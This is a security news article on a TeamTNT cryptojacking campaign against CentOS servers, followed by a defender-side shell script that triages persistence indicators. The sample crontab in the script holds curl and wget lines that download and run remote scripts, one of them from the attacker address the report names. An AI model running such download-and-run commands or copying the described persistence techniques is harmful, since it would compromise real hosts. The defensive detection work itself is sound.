The Latest TeamTNT Cryptojacking Offensive Targets CentOS Servers with Rootkit
A new campaign attributed to the cybercrime group known as TeamTNT has emerged, targeting Virtual Private Server (VPS) infrastructure running the CentOS operating system.
According to a report from Group-IB researchers Vito Alfano and Nam Le Phuong published on Wednesday, initial access was gained through a Secure Shell (SSH) brute-force attack against the victim’s systems, after which the attacker uploaded a malicious script.
The malicious script, as highlighted by the Singaporean cybersecurity company, is responsible for disabling security features, erasing logs, terminating competing cryptocurrency mining processes, and obstructing recovery actions.
The attack chain ultimately sets the stage for the deployment of the Diamorphine rootkit to hide malicious activity, while also establishing persistent remote access to the compromised host.
The activity has been linked to TeamTNT with moderate confidence, based on overlaps with the tactics, techniques, and procedures (TTPs) previously observed from the group.

TeamTNT was first identified in 2019, conducting illicit cryptocurrency mining operations by breaking into cloud and containerized environments. Despite bidding farewell in November 2021 with a claim of a “clean exit,” various intrusions have been attributed to the group since September 2022.
The recent activity associated with the group involves a shell script that first checks whether the host has already been infected by other cryptojacking campaigns, then weakens host defenses by disabling SELinux, AppArmor, and the firewall.
[Figure: Adaptations made to the SSH service]
“The script looks for a cloud provider daemon called aliyun.service associated with Alibaba,” the researchers mentioned. “Upon detection, it proceeds to retrieve a bash script from update.aegis.aliyun.com to remove the aforesaid service.”
In addition to shutting down all rival cryptocurrency mining operations, the script runs several commands aimed at removing any traces of other miners, stopping containerized processes, and deleting images linked to any coin miners.
Moreover, it maintains persistence by setting up cron jobs that re-download the shell script every half hour from a remote server (65.108.48[.]150) and by modifying the “/root/.ssh/authorized_keys” file to add a backdoor account.
“It secures the system by altering file attributes, creating a covert user with root privileges, and erasing command history to conceal its undertakings,” the researchers pointed out. “The threat actor takes every precaution; indeed, the script enacts diverse modifications within the SSH and firewall service configurations.”
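The indicators described above (a cron job pulling a script from the reported address, an extra authorized_keys entry, a covert UID-0 user, and immutable file attributes) can be triaged on a CentOS host with a few shell checks. The script below is an added example written for this article; it is not the Group-IB researchers' tooling or the attacker's script. Each function reads the relevant file content from stdin and prints a count, so it runs against real files (`cat /etc/crontab | count_cron_iocs`) as well as the constructed samples at the bottom. The IP address is the one named in the report; every other value in the samples (key material, the account name `sysupd`, hostnames, paths) is made up for demonstration.

```shell
#!/bin/sh
# Added example (not from the Group-IB report or the attacker's script):
# defender-side triage checks for the persistence indicators the article
# describes on a CentOS host. Every function reads file content on stdin
# and prints a count, so it can be fed real files or the samples below.

IOC_IP_RE='65\.108\.48\.150'   # address named in the report (regex-escaped)

# Crontab lines that reference the reported address, or that pipe a curl/wget
# download straight into a shell (the report describes a cron job fetching
# the script every 30 minutes).
count_cron_iocs() {
    grep -cE "$IOC_IP_RE|(curl|wget)[^|]*[|][[:space:]]*(ba)?sh" || :
}

# authorized_keys entries whose comment field is not on the administrator's
# allowlist of expected key comments ($1, space-separated). Lines without a
# recognisable key type are flagged too rather than silently skipped.
count_unexpected_keys() {
    awk -v allow="$1" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        /^[[:space:]]*(#|$)/ { next }                      # comments and blanks
        {
            k = 0
            for (i = 1; i <= NF; i++) if ($i ~ /^(ssh-|ecdsa-)/) { k = i; break }
            if (k == 0) { bad++; next }                    # unparseable: flag it
            c = ""
            for (i = k + 2; i <= NF; i++) c = (c == "" ? $i : c " " $i)
            if (!(c in ok)) bad++
        }
        END { print bad + 0 }'
}

# /etc/passwd accounts other than root that carry UID 0 (the report describes
# a covert user with root privileges).
count_extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { n++ } END { print n + 0 }'
}

# lsattr output lines with the immutable (i) flag set. The report says the
# script alters file attributes; +i blocks cleanup until it is removed again.
count_immutable() {
    awk '$1 ~ /i/ { n++ } END { print n + 0 }'
}

# Run the four checks against the live host (requires root to read the files).
triage_live_host() {
    echo "cron IoCs:        $(cat /etc/crontab /etc/cron.d/* 2>/dev/null | count_cron_iocs)"
    echo "unexpected keys:  $(cat /root/.ssh/authorized_keys 2>/dev/null | count_unexpected_keys "$1")"
    echo "extra UID-0:      $(cat /etc/passwd | count_extra_uid0)"
    echo "immutable files:  $(lsattr /etc/crontab /root/.ssh/authorized_keys 2>/dev/null | count_immutable)"
}

# --- Constructed samples (not captured from a real incident) ---------------
SAMPLE_CRON='SHELL=/bin/bash
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/30 * * * * root curl -s http://65.108.48.150/placeholder.sh | bash
@reboot root wget -qO- http://example.invalid/p.sh | sh'

SAMPLE_KEYS='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEKEYMATERIAL000000000000000000 admin@bastion
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEKEYMATERIAL111111111111111111 root@unknown-host'

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
sysupd:x:0:0::/var/tmp/.sysupd:/bin/bash'

SAMPLE_LSATTR='----i---------e------- /root/.ssh/authorized_keys
--------------e------- /etc/crontab'

# Demo on the samples: expected 2, 1, 1, 1.
echo "cron IoCs:        $(printf '%s\n' "$SAMPLE_CRON" | count_cron_iocs)"
echo "unexpected keys:  $(printf '%s\n' "$SAMPLE_KEYS" | count_unexpected_keys 'admin@bastion')"
echo "extra UID-0:      $(printf '%s\n' "$SAMPLE_PASSWD" | count_extra_uid0)"
echo "immutable files:  $(printf '%s\n' "$SAMPLE_LSATTR" | count_immutable)"
```

Two caveats apply when running this on a suspected host. Diamorphine-style rootkits hide their own module and processes, so a clean `lsmod` or `ps` output is not evidence of absence, which is why the checks above rely on file content rather than process listings. And because the script sets immutable attributes, `count_immutable` is worth running before any cleanup: a non-zero count means `chattr -i` is needed first, and the attribute itself is a strong indicator on files an administrator never marked immutable.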